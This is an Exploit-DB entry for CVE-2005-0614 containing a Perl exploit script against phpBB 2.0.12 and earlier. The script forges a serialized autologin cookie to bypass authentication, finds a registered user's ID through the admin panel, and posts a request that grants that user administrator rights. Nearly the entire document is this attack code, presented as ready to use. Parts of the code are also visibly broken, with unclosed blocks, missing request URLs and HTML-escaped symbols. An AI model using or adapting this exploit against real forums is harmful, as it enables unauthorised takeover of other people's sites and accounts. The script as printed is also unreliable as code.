phpBB <= 2.0.12 Change User Rights Authentication Bypass

Type exploitdb
Reporter Kutas
Modified 2005-03-21T00:00:00


phpBB <= 2.0.12 Change User Rights Authentication Bypass. CVE-2005-0614. Webapps exploit for php platform

                                            #!/usr/bin/perl -w

# phpBB &lt;=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable 
# More:
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
#   by Kutas,
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV &lt; 3)
 print q(
 Usage: perl [site] [phpbb folder] [username] [proxy (optional)] 
 i.e. perl /forum/ BigAdmin
use strict;
use LWP::UserAgent;

my $host  = $ARGV[0];
my $path  = $ARGV[1];
my $user  = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path; 

use HTTP::Cookies;
my $browser = LWP::UserAgent-&gt;new ();
my $cookie_jar = HTTP::Cookies-&gt;new( );
$browser-&gt;cookie_jar( $cookie_jar );
$cookie_jar-&gt;set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
	$proxy =~ s/(http:\/\/)//eg;
	$browser-&gt;proxy("http" , "http://$proxy");
 print "++++++++++++++++++++++++++++++++++++\n";
 print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser-&gt;get($request);
die "Error: ", $response-&gt;status_line
 unless $response-&gt;is_success;
if($response-&gt;content =~ m/phpbbprivmsg/) {
  print "\n   Forum is vulnerable!!!\n";
} else {
  print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response-&gt;content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser-&gt;post(
    'username'  =&gt; $user,
    'mode' =&gt; 'edit',
    'mode' =&gt; 'user',
    'submituser' =&gt; 'Look+up+User'
die "Error: ", $response-&gt;status_line
 unless $response-&gt;is_success;

if ($response-&gt;content =~ /name="u" value="([\d]*)"/) 
	{print "   Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
   else {print "No user $user found..."; exit(); }	
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser-&gt;post(
    'userlevel'  =&gt; 'admin',
    'mode' =&gt; 'user',
    'u'=&gt; $uid,
    'submit'=&gt; 'Submit'
die "Error: ", $response-&gt;status_line
 unless $response-&gt;is_success;
print "   Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

# [2005-03-21]